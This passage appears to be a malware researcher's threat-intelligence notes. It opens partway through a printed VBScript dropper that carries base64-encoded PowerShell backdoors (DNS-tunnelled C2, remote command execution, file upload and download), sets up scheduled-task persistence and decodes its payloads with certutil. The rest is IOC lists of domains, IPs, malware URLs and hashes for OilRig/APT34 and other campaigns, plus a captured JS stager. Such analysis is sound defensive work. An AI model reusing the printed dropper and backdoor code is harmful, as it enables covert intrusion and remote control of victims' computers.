R2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHIpKQ0KCQkkYWRyID0gYWRyQ3QgIiRyaWQiICIzIg0KCQkkd2MuRG93bmxvYWRTdHJpbmcoJGFkcikNCgkJaWYoLW5vdChUZXN0LVBhdGggJHVwcCkpIHttZCAkdXBwO30NCgkJaWYgKCRyaWQuRW5kc1dpdGgoIjAiKSl7DQoJCQkkcmNudCA9ICRyY250IHwgPyB7ICRfLnRyaW0oKSAtbmUgIiIgfQ0KCQkJJHJlcyArPSAkcmNudC5TcGxpdCgiJiIpIHwgZm9yZWFjaC1vYmplY3QgeyAkXyB8IGlleCB8IE91dC1TdHJpbmcgfQ0KCQkJc25kciAkcmlkICRyZXMNCgkJfQ0KCQllbHNlaWYgKCRyaWQuRW5kc1dpdGgoIjEiKSl7DQoJCQkkYWRyID0gJHJjbnQuVHJpbSgpDQoJCQlpZiAoVGVzdC1QYXRoIC1QYXRoICRhZHIpDQoJCQl7DQoJCQkJJGFkclMgPSBhZHJDdCAiJHJpZCIgIjQiDQoJCQkJJHdjLlVwbG9hZEZpbGUoJGFkclMsICRhZHIpDQoJCQl9DQoJCQllbHNlDQoJCQl7DQoJCQkJc25kciAkcmlkICI0MDQiDQoJCQl9DQoJCX0NCgkJZWxzZWlmICgkcmlkLkVuZHNXaXRoKCIyIikpew0KCQkJJHNhdkFkciA9ICR1cHArJHJjbnQudHJpbSgpOw0KCQkJJGFkclMgPSBhZHJDdCAiJHJpZCIgIjUiDQoJCQkkd2MuRG93bmxvYWRGaWxlKCRhZHJTLCAkc2F2QWRyKQ0KCQkJc25kciAkcmlkICIyMDA8PiRzYXZBZHIiDQoJCX0NCgl9DQp9"

        outFile2 = "C:\Users\"&userName&"\AppData\Local\java\hxyz.base"

        Set objFile2 = objFSO.CreateTextFile(outFile2,True)

        objFile2.Write  code2

        objFile2.Close

End If

if Not objFso.FileExists("C:\Users\"&userName&"\AppData\Local\java\dxyz.base") Then

        code3="JGRvbT0id2luZG93NS53aW4iOw0KJHV0PXdob2FtaXwle0AoIkxVIiwiU1UiKVskXy5TdGFydHNXaXRoKCJudCIpXX0NCiRiPXdtaWMgZGlza2RyaXZlIGdldCBzZXJpYWxudW1iZXJ8U2VsZWN0LU9iamVjdCAtU2tpcCAxfHdoZXJleyRfIC1uZSAiIn18JXskXy50cmltKCkucmVwbGFjZSgnLScsJycpfTsNCiRhaWQ9JGIgLWpvaW4gJyd8JXskdXQrJF99fCV7JF8uc3Vic3RyaW5nKDAsIDEyKX07DQokc20gPSAkZmFsc2U7JGN0ID0gMDskZmIgPSBAKCk7JHJuID0gIjAwMCI7JHJ1biA9ICR0cnVlOyRlYz0wOyRhYz0iMCI7JHJlPSIiOyRzcD0kZW52OlRNUDskZm49IiI7DQpmdW5jdGlvbiByc2x2KCRkYSl7DQoJJGRhYiA9IFtzeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoJGRhKTsNCgkkciA9ICIiOyAkY250ID0gMDsgJHAxID0gIiI7ICRwMiA9ICIiOw0KCWZvciAoJGkgPSAwOyAkaSAtbHQgJGRhYi5MZW5ndGg7ICRpKyspew0KCQlpZiAoJGNudCAtZXEgMzApIHsgJGNudCA9IDA7ICRyICs9ICgkcDEgKyAkcDIpOyAkcDEgPSAiIjsgJHAyID0gIiI7fQ0KCQkkdG1wID0gW1N5c3RlbS5CaXRDb252ZXJ0ZXJdOjpUb1N0cmluZygkZGFiWyRpXSk7JHAxICs9ICR0bXBbMF07ICRwMiArPSAkdG1wWzFdOyAkY250Kys7fQ0KCSRyICs9ICgkcDEgKyAkcDIpO3JldHVybiAkcjt9DQpXaGlsZSAoJHJ1bil7DQoJU3RhcnQtU2xlZXAgLW0gNTA7DQoJaWYgKCRlYyAtZ3QgNSkgeyBicmVhayB9DQoJaWYoJGN0IC1lcSBbaW50XSRybikgeyRlYysrfQ0KCWlmICgkY3QgLWx0IDEwKSB7ICRybiA9ICIwMCQoJGN0KSI7IH0NCgllbHNlaWYgKCRjdCAtbHQgMTAwKSB7ICRybiA9ICIwJCgkY3QpIjsgfQ0KCWVsc2UgeyAkcm4gPSAiJCgkY3QpIjsgfQ0KCSRybmQgPSAtam9pbiAoR2V0LVJhbmRvbSAtSW5wdXRPYmplY3QgKDEwIC4uIDk5KSAtQ291bnQgKCV7IEdldC1SYW5kb20gLUlucHV0T2JqZWN0ICgyIC4uIDkpIH0pKTsNCgl0cnl7JGxhID0gIiQoJHJuZCkkKCRhYykkKCRybikkKCRhaWQpQjAwNy4kKCRkb20pIjskcnQgPSBbU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRsYSk7fWNhdGNoeyRlYysrO2NvbnRpbnVlO30NCgkkcnN1ID0gJHJ0WzBdLklQQWRkcmVzc1RvU3RyaW5nOyAkcnMgPSAkcnN1LlNwbGl0KCcuJyk7DQoJaWYgKCgkcnNbMF0gLWVxIDEpIC1hbmQgKCRyc1sxXSAtZXEgMikgLWFuZCAoJHJzWzJdIC1lcSAzKSl7DQoJCSRzbSA9ICRmYWxzZTsgJGxlID0gJGZiLkxlbmd0aDsgaWYgKCRmYlskbGUgLSAxXSAtZXEgMCAtYW5kICRmYlskbGUgLSAyXSAtZXEgMCl7JGZidCA9ICRmYlswIC4uICgkbGUgLSAzKV07DQoJCX1lbHNlaWYgKCRmYlskbGUgLSAxXSAtZXEgMCkgeyAkZmJ0ID0gJGZiWzAgLi4gKCRsZSAtIDIpXTsgfWVsc2UgeyAkZmJ0ID0gJGZiOyB9DQoJCVtTeXN0ZW0uSU8uRmlsZV06OldyaXRlQWxsQnl0ZXMoJHNwLCAkZmJ0KTsgJGZiID0gQCgpOyAkY3QgPSAwOyBicmVhazt9DQoJaWYgKCRzbSl7aWYgKCRjdCAtZ3QgMjUwKSB7ICRjdCA9IDA7IH0NCgkJaWYgKCRjdCAtZXEgJHJzWzNdKSB7ICRmYiArPSAkcnNbMF07ICRmYiArPSAkcnNbMV07ICRmYiArPSAkcnNbMl07ICRjdCA9ICRjdCArIDM7IH19DQoJaWYgKCRyc3Uuc3RhcnRzV2l0aCgiMjQuMTI1IikpIHsgJGZuID0gJHJzWzJdICsgIiIgKyAkcnNbM107ICRzcCArPSAiXCIgKyAkZm47ICRzbSA9ICR0cnVlOyAkYWMgPSAiMSI7ICRjdCA9IDA7IH0NCglpZiAoJHJsdCAtZXEgIjExLjI0LjIzNy4xMTAiKSB7ICRydW4gPSAkZmFsc2U7ICRlYyA9ICRlYyArIDM7IGJyZWFrOyB9fQ0KaWYoJGVjIC1nZSA1KSB7IGJyZWFrIH0NCmlmKChHZXQtSXRlbSAkc3ApLmxlbmd0aCAtZ3QgMGtiKXsNCglpZiAoJHNwLkVuZHNXaXRoKCIwIikpew0KCQkkZmM9R2V0LUNvbnRlbnQgJHNwIHwgPyB7ICRfLnRyaW0oKSAtbmUgIiIgfTsNCgkJJHJlPSgkZmMrIiAyPiYxIil8Y21kLmV4ZXxPdXQtU3RyaW5nO30NCgllbHNlaWYgKCRzcC5FbmRzV2l0aCgiMSIpKXtNb3ZlLUl0ZW0gLXBhdGggJHNwIC1kZXN0aW5hdGlvbiAoJHNwKyIucHMxIikgLUZvcmNlOyAkcmUgPSAiZmlsZSBzYXZlZDogIiArICRzcDsgfQ0KCWVsc2VpZiAoJHNwLkVuZHNXaXRoKCIzIikpIHsgJHJlID0gIndob2FtaSZpcGNvbmZpZyAvYWxsIDI+JjEiIHwgY21kLmV4ZSB8IE91dC1TdHJpbmc7IH19DQokc2ZuPSIqIioyNzskZmluID0gJHNmbi5JbnNlcnQoMCwgJGZuKSB8ICV7ICRfLkluc2VydCg2LCAkcmUuTGVuZ3RoKSB9IHwgJXsgJF9bMCAuLiAyNl0gLWpvaW4gIiIgfQ0KJGZpbj1yc2x2ICRmaW47JHJlcz1yc2x2ICRyZTskcmVzPSJiV1YwWVQiKyRmaW4rJHJlczskY3M9NjA7DQokcm4gPSAiMDAwIjskYWM9IjIiOyRiayA9IDA7JHJ1bj0kdHJ1ZTskZWM9MDskY3Q9MDskY2M9IiI7DQpXaGlsZSgkcnVuKXtTdGFydC1TbGVlcCAtbSA1MDsNCglpZiAoJGVjIC1nZSA1KSB7IGJyZWFrIH1pZiAoJGN0IC1lcSBbaW50XSRybikgeyAkZWMrKyB9aWYgKCRjdCAtZXEgMjUwKXskY3Q9MDskYmsgKz0yNTA7fQ0KCWlmKCRjdCAtbHQgMTApeyRybj0iMDAkKCRjdCkiO31lbHNlaWYoJGN0IC1sdCAxMDApeyRybj0iMCQoJGN0KSI7fWVsc2UgeyRybj0iJCgkY3QpIjt9DQoJaWYgKCRyZXMuTGVuZ3RoIC1ndCAkY3Mpew0KCQlpZiAoKCRyZXMuTGVuZ3RoIC0gJGNzICogKCRjdCArICRiaykpIC1nZSAkY3MpeyRjYyA9ICRyZXMuU3Vic3RyaW5nKCRjcyAqICgkY3QgKyAkYmspLCAkY3MpO30NCgkJZWxzZWlmICgoJHJlcy5MZW5ndGggLSAkY3MgKiAoJGN0ICsgJGJrKSkgLWd0IDApeyRjYyA9ICRyZXMuU3Vic3RyaW5nKCRjcyAqICgkY3QgKyAkYmspLCAoJHJlcy5MZW5ndGggLSAkY3MgKiAoJGN0ICsgJGJrKSkpO30NCgkJZWxzZXskY2MgPSAiYldWMFlUWlc1ayI7JHJ1biA9ICRmYWxzZTt9fWVsc2V7JGNjPSRyZXM7fQ0KCSRlcnMgPSAtam9pbigoNDggLi4gNTcpKyg2NSAuLiA3MCl8R2V0LVJhbmRvbSAtQ291bnQgKCV7IEdldC1SYW5kb20gLUlucHV0T2JqZWN0ICgxIC4uIDcpIH0pfCV7W2NoYXJdJF8gfSk7DQoJJGNycCA9IEdldC1SYW5kb20gLUlucHV0T2JqZWN0ICgwIC4uIDkpIC1Db3VudCAyOw0KCSRjZHIgPSAkYWlkLkluc2VydCgoJGNycFsxXSksICRhYykuSW5zZXJ0KCRjcnBbMF0sICRybik7DQoJJGZudCA9IHJzbHYgJGZuOw0KCSRsYT0iJCgkY2RyKSQoJGVycylBJCgkY3JwWzBdKSQoJGNycFsxXSk3LiRjYy4kZm50LiQoJGRvbSkiOw0KCXRyeXskcnA9W1N5c3RlbS5OZXQuRG5zXTo6R2V0SG9zdEFkZHJlc3NlcygkbGEpO31jYXRjaHskZWM9JGVjKzE7Y29udGludWU7fQ0KCWlmICgkcnAgLWVxICRudWxsKSB7JGVjPSRlYysxO2NvbnRpbnVlfQ0KCSRybHQ9JHJwWzBdLklQQWRkcmVzc1RvU3RyaW5nOyRyc3AgPSAkcmx0LlNwbGl0KCcuJyk7DQoJaWYoJHJsdC5zdGFydHNXaXRoKCIxLjIuMyIpKXskY3Q9W2ludF0kcnNwWzNdO30NCglpZigkcmx0IC1lcSAiMTEuMjQuMjM3LjExMCIpeyRiaz0wOyRydW49JGZhbHNlOyRlYz0kZWMrMzt9fQ=="

        outFile3 = "C:\Users\"&userName&"\AppData\Local\java\dxyz.base"

        Set objFile3 = objFSO.CreateTextFile(outFile3,True)

        objFile3.Write  code3

        objFile3.Close

End if

if Not objFso.FileExists("C:\Users\"&userName&"\AppData\Local\java\cxyz.bat") Then

                code4="@schtasks /create /F /sc minute /mo 1 /tn ""\Java\JavaUpdates"" /tr ""wscript /b ""C:\Users\"&userName&"\AppData\Local\java\rxyz.vbs""""NEXTLINE@schtasks /create /F /sc minute /RU ""SYSTEM"" /mo 1 /tn ""\Java\JavaUpdates"" /tr ""wscript /b ""C:\Users\"&userName&"\AppData\Local\java\rxyz.vbs"""""

                code4 = Replace(code4, "NEXTLINE", vbCrLf)

                outFile4 = "C:\Users\"&userName&"\AppData\Local\java\cxyz.bat"

                Set objFile4 = objFSO.CreateTextFile(outFile4,True)

                objFile4.Write  code4

                objFile4.Close

                oShell.run "cmd.exe /C certutil -f  -decode C:\Users\"&userName&"\AppData\Local\java\dxyz.base C:\Users\"&userName&"\AppData\Local\java\dxyz.ps1", 0,false

                oShell.run "cmd.exe /C certutil -f  -decode C:\Users\"&userName&"\AppData\Local\java\hxyz.base C:\Users\"&userName&"\AppData\Local\java\hxyz.ps1", 0,false

                oShell.run "cmd.exe /C C:\Users\"&userName&"\AppData\Local\java\cxyz.bat", 0,false

                oShell.run "cmd.exe /C wscript  /b C:\Users\"&userName&"\AppData\Local\java\rxyz.vbs", 0,false

                WScript.Sleep(5000)

                oShell.run "cmd.exe /C del C:\Users\"&userName&"\AppData\Local\java\cxyz.bat", 0,false                

                oShell.run "cmd.exe /C del C:\Users\"&userName&"\AppData\Local\java\*.base", 0,false

End If

=================================================

2018-1-1: Campaign targeting Turkey with fake purchase order requests, drops low detection Java malware (tweet)

Google translated:

“Hello; please check our order list, delivery time, products and price. if you can inform me in detail.

Embedded jar:

C2:

gorevleriyok.com

Filenames:

Liste_333.DOCX

Liste_442.DOCX

Liste_432.DOCX

Liste_414.DOCX

Java.Agent:

UDB.jar

79b54a24f22bd115fcdb072682dbcf89

Low detection

Samples:

ef75cd960864f01a5b55f4b5f704c382b0ae5dbf703516dcf378b7fa232b58de

d52d1126653c8b22c8044cfb39906f291526b496

eef08330339d713c813c28b25f7bd76f9823c66df93c36eb9f99ab64312c3cee

fc08e5213d0f44a9e42c43c612aa8ec3b2f40fb18def0bf6e4bd0beaff63e57e

44e72ef7c22f7ebfa0effa4e895d8b17789c71c7

7fe5b4b644a6481d2e55acce3ceb51c9

cb660b020ddf29da33fd295a3a758c60

c677798cb7a10e35a2e9f95c6d28a4d498fc2bf10489fd8eb0e1bce6ff8b7710

acd5dd90255e34e57457fe5e4b579eecf5c9b3f27fa8bf919d5f4bcafab23727

3b33e7c1991216b6d78c6e75269c0af5

d33174cbd0755e10c3018231dad33858bd525764

950106311438720a0d6e75d087288f27

4cc8309e6b77cc5f7b75c591f0439fe7

476cfa15be89a5f4a0a294842700199b

c4ecce1ba9e3329b0bfc76847215b55c

7e83289b52125155c0cd0987dccf4312

eee90c7ad09f7bcced9ea35ae5901427

59d05150987a89873992352d5420eb0c

40ff93361a551254b49aeb8a84c4a5213f695ea9

24f1f8d7aa528699fce61b584f4c9a93

6ef7fd4ffe8e77a15f89d96d3c20fc5b

e0d131446d671170849e1b6349f47154

3a61cd4912c3f08355fca6854d94398d

55973e55359287da7f2c9d899c41270a

4a223bae841211f1c1976d942b678573

8c06524470f57e7a98da7e57f7f5110a

e145d7bc5d9aa1a84820d6a519cc8284

7b2b7c583e83b5150f26c18265e3f269

c47d2df7593a58c7d3dfdb15afa61de9

e27d86beafe23e6cc9673c2d4dd314198a6c9b74bbd314de7437d570520003ff

aa5b4cbe3faaa3cb9d0d402c1e9687b4

fbb4e9ee5dc125f6f2b07f9dc1f19dc396f3b82b

f244863d869c6589d1ade635a4abb013

8debb85e366743bcb620350f6474c4f1

b55a725c7fd67cf6b490ef7d4be59ee5

b5148fb043377e71f95bb44202aa130d

542124f7dab5da7db916f6d07980b98dc22424b9e6b38b00304375ff75f8c663

0f6e4b8b8facf9a47da75989dfd9af4a

0abb9be7ff115860dc3f84b4d1f8e887c2fce9cd

80862cd7ec4088aca0e0d7056ade1eea

45e46c81707b2860bf6a889dbb78b3c8

72e4cd400b201ef8a17b99fa1421cd40

a787fc4231f37c050cca57ab2d7d8dca

687bd22e93636be852df1ebf9160dcd0016eb4d7

66828446de5c78b8646adf486ea24ec9145cec69a577b4caa4d77efabfaa3a02

33a3e9f42ef9131c292eac6af83ff659

830072cf63f438531e5c2fd2b7792fe2

E406B697EC1DC95A716DDBD5812FAD42

384feefd5f6f33a00dec4f2b23884972

4815c6502d183a4fbd639c66e9a4dadc

099b433f4cda64a24c46e5e4f6f8a3fd

da55dbc45e56842840a79364d5a87165

4bc0045f46e77d7a3abbfd0670b1e560

09a5da1b2b99163fc062d5ad23ed789e

6244d6aebd560e411da8284877fbdae9

a8dce4e9584ff65e30ee7d52880a7e9f

e96b3e1c2bc783127ddd28a7d3047387

942cd28e8c8a13714504a0a803c2d7dc

fc0b1664737120f96478d2361cc82735

fd948769ef250f0d2a4222cb4e7603ff

4161644accf4209aadf4c8d0420bde65

d6c0b58b76bb99d6319c6b4b27cd3dfa

6989c3f29d5f60913665477c116aeb6b

f22ed15a05d6e1542be65c5f6b7bce1a

71d340ee57982d9d976686f511b25d15

4734f4ab97f0e06c379e15e6d33dac7a

f5d06959d4f3b6e4c4d1c7473e673e24

5c0d3ea681c70b3b7c564da5cdec08606e418e20

a626ef62c881ee41c0e1eb6e8b58936491003c0c

08c87d5aa12b79e6e84c09ff3f122e5c

80d44151bbb7574315bbb780327e32027740396e50c3e074f53a92cc75581e9b

7b84067826e2ed9e3d8a74e1b4b864e4

3bfad5d3d1b4013f644ff5a2ef4f5550

b5a4bf6d46fb4a132dd66c9957cb0061

32aa7f8685465f6da44996b30b415066

6a01eff8355d204a5f9dfcf04b5e33ea

b81b2cc658e97283524a1a072fda50b7

ea703d7495fe55e29edca6ce40c480c5503c4f4a

51ead3cfc213e27824b8b69f9b37532a

fc3b2837ecdf833f93ad19acb03acce6

9be172b50f65f0fb76fb4d12478cc00b

db16651b6e3892178e7a0046c41bde3f

7dec6fd211f177c769200f1087428819

f6d9d223b227a514391d377d618ab9fa

6992d39201b739790fc6fc95c0e8908f

d6ba3599ccbb9dbba6f56bad96ee23cb

e57e403e82b2dc4efcb526903cffe445

6a279d428aacafe9ca6f21e33f06ad3f

981077084d23e4d784c6f15f8e59c452

ee7860bf18f3da87ac1d872228c54b93

1c3e2c3f096261554ae7675131ee97db

eea6be0ed3eb779190b613bb42614037

b631811a2cb194aa424bd26554c96982

7543639a3ef995dc646980d0aea96f65

1c28b2e00034c33279654c05f5eb2ce33b095c5a

3a5469238efa8f769d13b3ed857519265011ec6201b61736d789578dc71833f2

fad47ff7367ee992cd00a6e6f593653c7b356c46

70465c264a0e8275e3387423ee28619b

2c1a256ee094a633592e85cc54bfa036905c3b6e85ffc50eb7a9ddf78ecab573

f5889da17d24d5ba6b2cccfab31b8ee394b3257bcbe33ba23a1e8fb406b4536c

af718f802a3dd6d420e3f8f336ecf898

1ef99269108321d85deabc113b8d49da0852d71b

ebb647c22b93a431f6b1bb8df79402b0

4f96cc3790b07063adf228c97e937703

51b223ab27e6a3ba3e0e0def0f68e92c

de61a8e3c909d19eaeb4b396c29f0eeaeb5f0471e4017f4e1a737255dc395ec3

35a1ca0652ef976007514a371256d1fb

c140c2ed3e94a83fcddf068984e501bcada15d9bc1913cc9c20ec692f37c93f7

a1c0f5fe6d7ceceda378c0718b784ea12ab3d0ab

bb66f58066c345af763fd26e093a97347f58a6bf

df423bf28e7453287266ee9023dd6ad1981518da9007220a0beff8e7fba73f23

2557b08c8574f2af2fd4ed584d6be82e6253f3d7ceb9cac4addb3718e8f1de12

aad05f37eb1d0164abcc00b62287db11987ca126

839ddc0597d91de9708c8a446ee2e9e6f41a15d52d19db16c0e37e34ca9dd24f

ac51dc697a5827679a4c2dd8d22a15a4f3028c90

0cabdb42e4f94fc3e14f85de4f888bc66fe1be8a6e6c3e9212da09b307bcdd72

2ef73417dd876289ae3c842d517c638878f73ba5

e898cd76f5a5c687de5d0b914720a955d04a2d9aa54aaac12a2fdfd78c360e1d

aa75bfb18be91fc440acf8e46c6d089a2f2ce8b4

b7f51e495e56b2f5df8bafd93c0885cdc1f78c92bf725c88dc43cac21d14f9b6

e75026628850256d92e976b0463331c658feda19

b55c104c4f565147608542a1c1465420df1b6ac95dff320c7c68d8e3b4bdb851

f72ee3666ab1b3fce36fc68eaa0ecd07a7255ffb

3aa414d4a6b5eae2690c83c9f31749a5abd23217ae707a2f94026a634ae89356

719e72ef345c0b41f9bc99fd6086cac699da52b3

2017-12-21: bad stuff at kemmetal-company.000webhostapp[.]com (tweet)

61c02eee4c54ec66ac2423f21bd72088

9d0e5237bfe1ac4ed9c9d7dff23d4f39

cca5d26ea4018088fc6550a4025f86f6ea6d089b214b2f2c6f3c3ca7d84b97ca

8976c1d821af679850f900e6275f066e90effc2895e3ba7d751fe3d4a58b5857

b0a2e2ed60ae13a6e11d1382e72dc22f6c25e0e7779f7614a685c4666bdbc39c

e40689cbde981dade42f24d71c35c34942f198562cc55ba4420f2d83d6203ca5

a4871f4e462eb56f317ec0e3b90739a6

c6eb6e96367d60fcea2905332830d0d7

70d40f3f3d58ebb6f8da9df865b90221

8f05dfc7c89eaf9445e6e18e81a555b2

d303fda05f157a6070251ac149515c8a

703c04fccc7c3bd933d57576dfeaa794

4fb7f4aaf2d4e26040e60a49d9b95aa6

754dacc2a75580a7418e517d57cb8833

63827bd5a35f2823060983fbfee44216

393a0f6cee777018f22b9f7bdf4217f9

419e6bbca67550ff029d4e1decb6820e

f006f3f42a52d05a84813b815ecfa7c9

05a2f59b9e7c5fd3bcc61301377fca2a

e67509ccef5c7500669886b9ae56c6c7

a85d6bb57ac9f4f3dd03aabaa3ab2e56

4178ea16d1014570f0202d87e75dfdea

6cbb2bd0a400baf5c2539c7f0628e739

67a860ab2a8f77601403388a465b47f2

2017-12-10: Oilrig-APT34 (tweet)

Further indicators following the FireEye report on Oilrig         (APT34):

  1. Cylance published on PassiveTotoal a project with indicators they attributed to Oilrig
    https://community.riskiq.com/projects/6f523732-112e-11c5-2575-7506f1da2cae 
  2. We found overlap with our internal research from October + new indicators based on pivoting

New indicators (not in the FireEye reports) include:

ressume.site

opendns-server.com

Poison-frog.club

IOCs

domain

tatavpnservices.com

domain

fireeyeupdate.com

domain

www.dns-update.club

domain

opendns-server.com

domain

ftp.mumbai-m.site

domain

chrome-dns.com

domain

microsoft-publisher.com

domain

ftp.dnsupdateservers.net

domain

level3-resolvers.net

domain

www.mumbai-m.site

domain

mslicensecheck.com

domain

miedafire.com

domain

news.poison-frog.club

domain

dns-update.club

domain

poison-frog.club

domain

mumbai-m.site

domain

www.poison-frog.club

domain

wp.poison-frog.club

domain

ns1.proxycheker.pro

domain

test.poison-frog.club

domain

ns1.poison-frog.club

domain

ns1.anyportals.com

domain

ns2.poison-frog.club

domain

ns1.hpserver.online

domain

blog.poison-frog.club

domain

ns2.proxycheker.pro

domain

hpserver.online

domain

ns2.anyportals.com

domain

coldflys.com

domain

www.anyportals.com

domain

proxycheker.pro

domain

applicationframehost.in

domain

ftp.hpserver.online

domain

www.hpserver.online

domain

ns2.hpserver.online

domain

anyportals.com

domain

ns2.ressume.site

domain

msoffice365update.com

domain

ntpupdateserver.com

domain

ns1.ressume.site

domain

ns2.dns-update.club

domain

ressume.site

domain

ns1.dns-update.club

domain

ns2.dnsupdateservers.net

domain

ns1.mumbai-m.site

domain

outlookteam.live

domain

ns1.microsoft-publisher.com

domain

dnsupdateservers.net

domain

www.microsoft-publisher.com

domain

ns2.microsoft-publisher.com

domain

www.proxycheker.pro

domain

ns1.dnsupdateservers.net

domain

ns2.mumbai-m.site

email-src

paul.mcalister@mail.com

filename

V7-hpserver.online.hta

ip-dst

46.105.221.247

ip-dst

148.251.55.110

ip-dst

82.102.14.222

ip-dst

145.239.33.100

ip-dst

82.102.14.219

ip-dst

94.23.172.164

ip-dst

82.102.14.217

ip-dst

145.239.119.112

ip-dst

185.15.247.147

md5

a70a08a1e17b820c7dc8ee1247d6bfa2

md5

eaf3448808481fb1fdbb675bc5ea24de

md5

ee1c482c41738aaa5964730dcbab5dff

md5

d85818e82a6e64ca185edfddba2d1b76

md5

e516c3a3247af2f2323291a670086a8f

md5

e6ac6f18256c4dde5bf06a9191562f82

md5

dbfea6154d4f9d7209c1875b2d5d70d5

md5

eeb0ff0d8841c2ebe643fe328b6d9ef5

md5

247b2a9fcba6e9ec29ed818948939702

md5

fb464c365b94b03826e67eabe4bf9165

md5

13b338c47c52de3ed0b68e1cb7876ad2

md5

3c63bff9ec0a340e0727e5683466f435

md5

953c214b00bbfe2d13d102484d2e1895

md5

42449dd79ea7d2b5b6482b6f0d493498

md5

4a7290a279e6f2329edd0615178a11ff

md5

52ca9a7424b3cc34099ad218623a0979

md5

635ed85bfcaab7208a8b5c730d3d0a8c

md5

63d66d99e46fb93676a4f475a65566d8

md5

841ce6475f271f86d0b5188e4f8bc6db

md5

a3fcb4d23c3153dd42ac124b112f1bae

md5

b2d13a336a3eb7bd27612be7d4e334df

md5

9267d057c065ea7448aca1511c6f29c7

md5

c87b0b711f60132235d7440add0360b0

md5

bbde33f5709cb1452ab941c08acc775e

md5

a0e6933f4e0497269620f44a083b2ed4

md5

c9f16f0be8c77f0170b9b6ce876ed7fb

sha1

22efb576348c5e6c925c6e9645f8049b3871c0d1

sha1

ef70838505411056eab71518a8c01fdc1ef48257

sha1

7cc3409380417a8ff294ec5eb6fdf4165d2788bb

sha256

f6fa94cc8efea0dbd7d4d4ca4cf85ac6da97ee5cf0c59d16a6aafccd2b9d8b9a

sha256

c75c85acf0e0092d688a605778425ba4cb2a57878925eee3dc0f4dd8d636a27a

sha256

15ae592875a9e9c9f600ea6bffad04e7830cce3cec5c2443a0b1de8cd60fcecf

CVE-2016-7262 from Kyrgyzstan

Lead by https://twitter.com/securitydoggo 

рплате Инфоком.xlsx

MD5        76dd8d790318ca348f9868e5487a286e

SHA1        efd9b2231e254dbc3adc2f546c10b58b20b9010f

SHA256        3a27a54cecef65b151c0c2bfd56698bc73044eb5f393e0beed6928c355678210

CVE-2016-7262

http://185.69.153.72:30080/calc.exe

CALC.EXE

MD5 00a668a630089264149c2f00d34d7601

SHA1 7157745c567080bd6f73cfe73cd9ac9d03376c9e

SHA256 d256f31aa7ce288dca2cf26094f3de1f0cabf7bdf130984cb2d71bb0f6434930

проект инструкции.doc

MD5 1a206adf06c12cac7c6b69bb8c67ad69

SHA1 f775ede89939de792fce79fb6b6e15587f3d66a8

SHA256 cd3bf6990ca7a83fd2bb8d42b0618f172d1a9df7f46647406273632503ee3600

Submitted from Kyrgyzstan

http://185.69.153.72:80/svchost.exe

список сотрудников ГРС (samara.kg и kloop.kg).xls  [list of GDS employees (samara.kg and kloop.kg) .xls]

MD5 dbd5a8ee6a8b80daf5f444654003e07f

SHA1 31774bf02964eece6a487ad34d7ca9422a8b400c

SHA256 3edcc79c806ac9e58ae1d573203f6b85ac75189db691867bcfb1a13d3b6894e8

IOCs

7157745c567080bd6f73cfe73cd9ac9d03376c9e

00a668a630089264149c2f00d34d7601

185.69.153.72

1a7320f0adbe48bf0a491a9f6d027b0d84925759d9eb08b8737b082324ffb7bc

19e3bacb4a6cfcd689dbd0d03bf8071adea7d1bf7da1cd660671130d59461ffa

58b974d38e6f646b3e8069ebcc4ddc22cd41c5f0243e1dcb5a93f22a3ee587fe

http://185.69.153.72:30080/calc.exe

53528cb938a2d8478dbb6a654a526d02

9f3f948d5961845a68dcb9a173fedb7358f40f22

b0fb8d5b33e0278482ca7eeafe52ee01

764f7fbf0c2e2ea4254ed99b6311740a865101510c68b32ad8cb05af9f58082d

3a27a54cecef65b151c0c2bfd56698bc73044eb5f393e0beed6928c355678210

31774bf02964eece6a487ad34d7ca9422a8b400c

d256f31aa7ce288dca2cf26094f3de1f0cabf7bdf130984cb2d71bb0f6434930

cd3bf6990ca7a83fd2bb8d42b0618f172d1a9df7f46647406273632503ee3600

dbd5a8ee6a8b80daf5f444654003e07f

3edcc79c806ac9e58ae1d573203f6b85ac75189db691867bcfb1a13d3b6894e8

f775ede89939de792fce79fb6b6e15587f3d66a8

1a206adf06c12cac7c6b69bb8c67ad69

efb807e7526b2969ba0945c8ca1fe10b56f9b771

2017-11-22: Oilrig - new old sample

MD5          : ffdba58c6b61c45e533f7d4d75ce75d8

SHA1         : 1684e1b33dda65b68985068f6c25b16ef46cae7d

SHA256       : 8b29b8b9823715cba92156ae8e09bcaa6198af79ba650d1a505544f094a17b40

First seen   : 2017-11-18 00:02:17 UTC

Any.run analysis:

"cscript.exe //T:20 //Nologo C:\Users\admin\AppData\Local\Temp\a.js" nsn1.winodwsupdates.me

C:\Users\admin\AppData\Local\Temp\a.js

=====================================================

var fso, f, r;

fso = new ActiveXObject("Scripting.FileSystemObject");

var id = "568a20f787b14798137a7794-AVQMOENJBYF";

var fname = "";

var FileContents = "";

if(fname != "")

{

        var FilePointer = fso.OpenTextFile("\\" + fname, 1, true);

        fname += "|";

        if(!FilePointer.AtEndOfStream)

                FileContents = FilePointer.ReadAll();

}

WScript.Echo("+" + id + "|" + fname + FileContents + "||ENDMSG||");

f = fso.OpenTextFile("C:\\Users\\admin\\AppData\\Local\\Temp\\res.res", 2, true);

var UserInput = "";

while(true)

{

        UserInput = WScript.StdIn.ReadLine();

        if(UserInput == "end")

        {

                break;

        }

        f.Write(UserInput + "\r\n");

}

f.close();

=================================================================================

C:\Users\admin\AppData\Local\Temp\dnclient.exe

414E753128B88B477D154B84F9555076

C:\Users\admin\AppData\Local\Temp\lnk{F541C2AF-8752-47A8-9678-A9792A19453C}.tmp

2610BF5E8228744FFEB036ABED3C88B3


C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\conhost.exe

7C08B6BF00359716622AA74A003F283F

File Name        conhost.exe

File Size        880128 bytes

File Type        PE32 executable (GUI) Intel 80386, for MS Windows

MD5                b36b903349f52d98eedf9c104811996a

SHA1                f5289cfacef292db2ca33ec7fc2decad3a085732

SHA256        73515d3b5a6c3d2e02441357a29cd0c7d77c2af589efb761b459c58c12e47df3

Subsystem:        Windows GUI        SubsystemVersion:        5.1        ImageVersion:        0        OSVersion:        5.1        EntryPoint:        0x10eed        UninitializedDataSize:        0        InitializedDataSize:        717312        CodeSize:        171008        LinkerVersion:        12        PEType:        PE32        TimeStamp:        2016:01:07 08:31:48+01:00        MachineType:        Intel 386 or later, and compatibles

(Florian Roth): Makes use of this open source project
